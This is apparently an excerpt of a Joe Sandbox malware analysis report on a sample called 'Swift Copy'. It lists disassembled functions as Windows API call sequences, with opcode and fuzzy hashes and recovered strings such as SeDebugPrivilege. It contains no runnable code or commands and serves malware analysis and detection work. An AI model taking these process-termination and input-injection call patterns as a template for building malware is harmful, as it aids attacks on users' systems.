                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                              • String ID:
                                              • API String ID: 337547030-0
                                              • Opcode ID: e02aab0f1c4202863ca2054fb58fcb83dc7b8a87c7a395583579ca82c6ff1b4b
                                              • Instruction ID: a22c4c591f825f0e08fb7b91729bd6dbe52c3bdcd77882b7c8c8402d33ba12e3
                                              • Opcode Fuzzy Hash: e02aab0f1c4202863ca2054fb58fcb83dc7b8a87c7a395583579ca82c6ff1b4b
                                              • Instruction Fuzzy Hash: 1031B071210B81AFDB21AFB6DC04A67BBF8FF18300B18551EFA9696610D731E856DB70
                                              APIs
                                                • Part of subcall function 00DD3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DD3A57
                                                • Part of subcall function 00DD3A3D: GetCurrentThreadId.KERNEL32 ref: 00DD3A5E
                                                • Part of subcall function 00DD3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00DD25B3), ref: 00DD3A65
                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00DD25BD
                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00DD25DB
                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00DD25DF
                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00DD25E9
                                              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00DD2601
                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00DD2605
                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00DD260F
                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00DD2623
                                              • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00DD2627
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                              • String ID:
                                              • API String ID: 2014098862-0
                                              • Opcode ID: 7ce1ff546b0a4f37869c96ef36a6e10c79361453a79c1cc77450a0ef6d9d16e7
                                              • Instruction ID: 26efbe28141f02a8d94ea044eb9ebe6a6e94486f0e7089930b88ed6ae1e8cd0d
                                              • Opcode Fuzzy Hash: 7ce1ff546b0a4f37869c96ef36a6e10c79361453a79c1cc77450a0ef6d9d16e7
                                              • Instruction Fuzzy Hash: 4401D830390210BBFB2067699C8AF593F69DB5EB11F200102F354BF1D1C9E354888ABA
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00DD1449,?,?,00000000), ref: 00DD180C
                                              • HeapAlloc.KERNEL32(00000000,?,00DD1449,?,?,00000000), ref: 00DD1813
                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00DD1449,?,?,00000000), ref: 00DD1828
                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00DD1449,?,?,00000000), ref: 00DD1830
                                              • DuplicateHandle.KERNEL32(00000000,?,00DD1449,?,?,00000000), ref: 00DD1833
                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00DD1449,?,?,00000000), ref: 00DD1843
                                              • GetCurrentProcess.KERNEL32(00DD1449,00000000,?,00DD1449,?,?,00000000), ref: 00DD184B
                                              • DuplicateHandle.KERNEL32(00000000,?,00DD1449,?,?,00000000), ref: 00DD184E
                                              • CreateThread.KERNEL32(00000000,00000000,00DD1874,00000000,00000000,00000000), ref: 00DD1868
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                              • String ID:
                                              • API String ID: 1957940570-0
                                              • Opcode ID: 4cfd33aa37426ecd99c8aed4b715249a2bc24a1a1c02457ddc7e75f5227cdb30
                                              • Instruction ID: e5dde93b64b4b8e826c2d50c5a4d3c395c883de92d26488f37c4b137419ff282
                                              • Opcode Fuzzy Hash: 4cfd33aa37426ecd99c8aed4b715249a2bc24a1a1c02457ddc7e75f5227cdb30
                                              • Instruction Fuzzy Hash: FB01BF75241304BFE710AB65DC4DF573B6CEB89B11F104511FA05DB192C6759844CB20
                                              APIs
                                                • Part of subcall function 00DDD4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00DDD501
                                                • Part of subcall function 00DDD4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00DDD50F
                                                • Part of subcall function 00DDD4DC: CloseHandle.KERNEL32(00000000), ref: 00DDD5DC
                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DFA16D
                                              • GetLastError.KERNEL32 ref: 00DFA180
                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DFA1B3
                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00DFA268
                                              • GetLastError.KERNEL32(00000000), ref: 00DFA273
                                              • CloseHandle.KERNEL32(00000000), ref: 00DFA2C4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                              • String ID: SeDebugPrivilege
                                              • API String ID: 2533919879-2896544425
                                              • Opcode ID: 4e7838979877d932d34a03a06e3918fb8751e9fc85ae4b9825883e2ca43e7397
                                              • Instruction ID: 24706cb32b6dc040b80108544ca64c3751e4e67f3a4dfe9aeb1103c3ee2f24cd
                                              • Opcode Fuzzy Hash: 4e7838979877d932d34a03a06e3918fb8751e9fc85ae4b9825883e2ca43e7397
                                              • Instruction Fuzzy Hash: AF619E70205242AFD710DF19C494F29BBE1AF44318F1AC48CE56A4B7A3D776ED49CBA2
                                              APIs
                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00E03925
                                              • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00E0393A
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00E03954
                                              • _wcslen.LIBCMT ref: 00E03999
                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00E039C6
                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00E039F4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window_wcslen
                                              • String ID: SysListView32
                                              • API String ID: 2147712094-78025650
                                              • Opcode ID: 0e5de3897c758413cde8cf9c25a0a44393ebb93038dfe050c0b5e27f21b50d7e
                                              • Instruction ID: db33d3564f4a366a51c5af9fe667f5e7da966d0bfb33200fe7917e8a0943eb53
                                              • Opcode Fuzzy Hash: 0e5de3897c758413cde8cf9c25a0a44393ebb93038dfe050c0b5e27f21b50d7e
                                              • Instruction Fuzzy Hash: 0841AF71A00318ABEF219F64CC49BEA7BA9EF48354F101566F958F72C1D7719AC4CBA0
                                              APIs
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DDBCFD
                                              • IsMenu.USER32(00000000), ref: 00DDBD1D
                                              • CreatePopupMenu.USER32 ref: 00DDBD53
                                              • GetMenuItemCount.USER32(00F47290), ref: 00DDBDA4
                                              • InsertMenuItemW.USER32(00F47290,?,00000001,00000030), ref: 00DDBDCC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Menu$Item$CountCreateInfoInsertPopup
                                              • String ID: 0$2
                                              • API String ID: 93392585-3793063076
                                              • Opcode ID: 2f737f08ae905b53852ed5115a09e83b7550bac50bb261fd960432845d8e30ac
                                              • Instruction ID: f0ed79ab7fb9c54dc5a1262ca01ae095afd7e58f72e328e1be7d434367980087
                                              • Opcode Fuzzy Hash: 2f737f08ae905b53852ed5115a09e83b7550bac50bb261fd960432845d8e30ac
                                              • Instruction Fuzzy Hash: 80519F70600205DBDB10CFA9D884BAEBBF6FF49328F29425BE442A7390E7709945CB71
                                              APIs
                                              • LoadIconW.USER32(00000000,00007F03), ref: 00DDC913
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: IconLoad
                                              • String ID: blank$info$question$stop$warning
                                              • API String ID: 2457776203-404129466
                                              • Opcode ID: 6072fd61a7c49b4c14cfeeae29b188204318257ac8ab765d6d2b8114eff4ef24
                                              • Instruction ID: bd21fa2dcb1a65d56e20707f37d3beb6556ff5784e5efc18ed90c66dfa1cf4be
                                              • Opcode Fuzzy Hash: 6072fd61a7c49b4c14cfeeae29b188204318257ac8ab765d6d2b8114eff4ef24
                                              • Instruction Fuzzy Hash: 6D113A32699307BBEB019B64DC93CAA279CDF15329F60502BF500B6382E7B1AE01D674
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: _wcslen$LocalTime
                                              • String ID:
                                              • API String ID: 952045576-0
                                              • Opcode ID: 009eb12e4adeee68fc35b74945adf6dbf872cb354a8bef7bd45ca34180ff0383
                                              • Instruction ID: 47c790d4ef57ae735e4fa2d2a1a9b03ad4ddad53d388717a8a5e57993ef35384
                                              • Opcode Fuzzy Hash: 009eb12e4adeee68fc35b74945adf6dbf872cb354a8bef7bd45ca34180ff0383
                                              • Instruction Fuzzy Hash: 38417C65C102187ACF11EBF4888A9CFB7A9EF45710F508566F518E3222EB34E255C7BA
                                              APIs
                                              • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00DC682C,00000004,00000000,00000000), ref: 00D8F953
                                              • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00DC682C,00000004,00000000,00000000), ref: 00DCF3D1
                                              • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00DC682C,00000004,00000000,00000000), ref: 00DCF454
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ShowWindow
                                              • String ID:
                                              • API String ID: 1268545403-0
                                              • Opcode ID: 61857cc5029bc5b747b6337c8d68ecac14d2f65ff9f59ed3d93a628164f5f276
                                              • Instruction ID: fb56c5cba379ca3be7b9d02e3fc738dd526b47ab361c69e703255e80e8845726
                                              • Opcode Fuzzy Hash: 61857cc5029bc5b747b6337c8d68ecac14d2f65ff9f59ed3d93a628164f5f276
                                              • Instruction Fuzzy Hash: 9141E731618680FED739BB2A8888B6E7B92AB56314F1C453DE0C767560D676E8C4CF31
                                              APIs
                                              • DeleteObject.GDI32(00000000), ref: 00E02D1B
                                              • GetDC.USER32(00000000), ref: 00E02D23
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E02D2E
                                              • ReleaseDC.USER32(00000000,00000000), ref: 00E02D3A
                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00E02D76
                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00E02D87
                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00E05A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00E02DC2
                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00E02DE1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                              • String ID:
                                              • API String ID: 3864802216-0
                                              • Opcode ID: b2fdc62913e7351f8ee010933c644cb90d8b060029cd05de1cd8300dddb52bf5
                                              • Instruction ID: 42066d96a911067367feec885f1ae3d05e1c15f00c30a1068912b699a3258fa6
                                              • Opcode Fuzzy Hash: b2fdc62913e7351f8ee010933c644cb90d8b060029cd05de1cd8300dddb52bf5
                                              • Instruction Fuzzy Hash: B1319A72201214BFEB218F51DC8AFEB3BADEF09715F144155FE08AA2D1C6769C85CBA1
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: _memcmp
                                              • String ID:
                                              • API String ID: 2931989736-0
                                              • Opcode ID: 1f5432a89ad283d9a919b9ce78377d6b4cf11d381ffa352e45394cc670b45cb8
                                              • Instruction ID: f3b98352978df7c040303ae0184e760d8a57e00e63fb123d1496313e7adc630a
                                              • Opcode Fuzzy Hash: 1f5432a89ad283d9a919b9ce78377d6b4cf11d381ffa352e45394cc670b45cb8
                                              • Instruction Fuzzy Hash: FD21CC65B44B09B7E7155510AD83FFA736CEF11384F580022FD056AB85F720ED6085B5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: NULL Pointer assignment$Not an Object type
                                              • API String ID: 0-572801152
                                              • Opcode ID: f9067fca75f744dd63cabfb502c4fe0e3d0f4dd2362cf0ae65f91b8f59a040d4
                                              • Instruction ID: 284c58e5fdb4974a17b4870942df07dac421e663264eae9b7fc3239cb43d70fe
                                              • Opcode Fuzzy Hash: f9067fca75f744dd63cabfb502c4fe0e3d0f4dd2362cf0ae65f91b8f59a040d4
                                              • Instruction Fuzzy Hash: 0ED19271A0060AAFDF10CF98D880BBEB7B5BF48344F15C169EA15AB285D771DD45CB60
                                              APIs
                                              • GetCPInfo.KERNEL32(?,?), ref: 00DB15CE
                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00DB1651
                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00DB16E4
                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00DB16FB
                                                • Part of subcall function 00DA3820: RtlAllocateHeap.NTDLL(00000000,?,00E41444,?,00D8FDF5,?,?,00D7A976,00000010,00E41440,00D713FC,?,00D713C6,?,00D71129), ref: 00DA3852
                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00DB1777
                                              • __freea.LIBCMT ref: 00DB17A2
                                              • __freea.LIBCMT ref: 00DB17AE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                              • String ID:
                                              • API String ID: 2829977744-0
                                              • Opcode ID: 4f89775878b2dd043965a0ff3f5671fd9e73642c8fb43467c667ad8d2c944fd8
                                              • Instruction ID: 7ab1db5b8039d0e7c08b43bb2a7f396544eca64b2f1f4387145ca098d1554233
                                              • Opcode Fuzzy Hash: 4f89775878b2dd043965a0ff3f5671fd9e73642c8fb43467c667ad8d2c944fd8
                                              • Instruction Fuzzy Hash: 5891A379E10216DADB208E64C8A1AEE7BF5DF49710F984659E803E7141DB25DD44CB70
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Variant$ClearInit
                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
